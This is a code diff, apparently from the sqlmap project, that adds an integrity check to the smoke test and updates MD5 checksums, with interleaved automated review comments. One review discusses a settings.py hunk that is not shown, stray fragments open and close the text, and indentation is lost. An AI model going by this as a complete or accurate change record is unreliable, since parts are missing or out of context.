 GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
diff --git a/lib/core/testing.py b/lib/core/testing.py
index 2b121bf68ac..6f8a92a676d 100644
--- a/lib/core/testing.py
+++ b/lib/core/testing.py
@@ -17,6 +17,7 @@
 from extra.beep.beep import beep
 from lib.controller.controller import start
+from lib.core.common import checkIntegrity
 from lib.core.common import clearConsoleLine
 from lib.core.common import dataToStdout
 from lib.core.common import getUnicode
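Review bot: The new `"PASSED"` and `"FAILED"` entries in the settings.py hunk extend BOLD_PATTERNS as one ~20-element line, so a two-token addition shows up as a whole-line rewrite and the reader has to diff the tuple by eye to find what changed. Writing the tuple one element per line with a trailing comma would make the next addition a one-line hunk and keep the commit's intent visible. Per the comment above the tuple these are substrings matched against logger messages, so the upper-case `"PASSED"`/`"FAILED"` presumably target the new test-runner output rather than the existing lower-case "test passed"/"test failed" entries; a short comment beside them, e.g. `# upper-case markers emitted by the smoke/live test runner`, would record which messages they are meant to catch.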
@@ -51,41 +52,44 @@ def smokeTest():
 retVal = True
 count, length = 0, 0
- for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH):
- if any(_ in root for _ in ("thirdparty", "extra")):
- continue
-
- for filename in files:
- if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py":
- length += 1
-
- for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH):
- if any(_ in root for _ in ("thirdparty", "extra")):
- continue
-
- for filename in files:
- if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py":
- path = os.path.join(root, os.path.splitext(filename)[0])
- path = path.replace(paths.SQLMAP_ROOT_PATH, '.')
- path = path.replace(os.sep, '.').lstrip('.')
- try:
- __import__(path)
- module = sys.modules[path]
- except Exception, msg:
- retVal = False
- dataToStdout("\r")
- errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), msg)
- logger.error(errMsg)
- else:
- # Run doc tests
- # Reference: http://docs.python.org/library/doctest.html
- (failure_count, test_count) = doctest.testmod(module)
- if failure_count > 0:
+ if not checkIntegrity():
+ retVal = False
+ else:
+ for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH):
+ if any(_ in root for _ in ("thirdparty", "extra")):
+ continue
+
+ for filename in files:
+ if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py":
+ length += 1
+
+ for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH):
+ if any(_ in root for _ in ("thirdparty", "extra")):
+ continue
+
+ for filename in files:
+ if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py":
+ path = os.path.join(root, os.path.splitext(filename)[0])
+ path = path.replace(paths.SQLMAP_ROOT_PATH, '.')
+ path = path.replace(os.sep, '.').lstrip('.')
+ try:
+ __import__(path)
+ module = sys.modules[path]
+ except Exception, msg:
 retVal = False
-
- count += 1
- status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length))
- dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status))
+ dataToStdout("\r")
+ errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), msg)
+ logger.error(errMsg)
+ else:
+ # Run doc tests
+ # Reference: http://docs.python.org/library/doctest.html
+ (failure_count, test_count) = doctest.testmod(module)
+ if failure_count > 0:
+ retVal = False
+
+ count += 1
+ status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length))
+ dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status))
 clearConsoleLine()
 if retVal:
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index c27c127756e..47d6c96cc4a 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -49,11 +49,11 @@ fe370021c6bc99daf44b2bfc0d1effb3 lib/core/patch.py
 9a7d68d5fa01561500423791f15cc676 lib/core/replication.py
 3179d34f371e0295dd4604568fb30bcd lib/core/revision.py
 d6269c55789f78cf707e09a0f5b45443 lib/core/session.py
-43ee2f1b9e898fa8e9788b921f278609 lib/core/settings.py
+c799d8dee38e2da35b8aff0638f21129 lib/core/settings.py
 a8a7501d1e6b21669b858a62e921d191 lib/core/shell.py
 5dc606fdf0afefd4b305169c21ab2612 lib/core/subprocessng.py
 eec3080ba5baca44c6de4595f1c92a0d lib/core/target.py
-a057a8ae12fd21f6c409feee1266e7ad lib/core/testing.py
+2f87870562ac9a79a5105a0e20fdbf9a lib/core/testing.py
 5ebd996b2a77449df90320847e30a073 lib/core/threads.py
 2c263c8610667fdc593c50a35ab20f57 lib/core/unescaper.py
 5bd7cd6553a4a1c85cbaaddc268108e4 lib/core/update.py
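Review bot: When `checkIntegrity()` returns false the new `if not checkIntegrity():` branch only sets `retVal = False`, so the smoke test reports failure without saying why, whereas the import branch below logs an error for each broken module; I would add `logger.error("smoke test failed at integrity check")` inside that branch. The `else:` also pushes the otherwise unchanged walk and doctest loops one indentation level deeper; a guard such as `if not checkIntegrity(): logger.error("smoke test failed at integrity check"); return False` would keep the original body flat, provided the `clearConsoleLine()` and `if retVal:` tail after the hunk does not need to run in that case. If checkIntegrity is the verification against txt/checksum.md5 updated in this same commit, it detects accidental corruption of the checkout but, being MD5 sums shipped next to the code, is not a tamper check, and a one-line comment stating that scope at the call site would keep the result from being over-read. smokeTest's `def` line is in the hunk header and its body continues past `if retVal:` outside the hunk.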
    (7\.0|2000|2005|2008|2008 R2)*(.*?)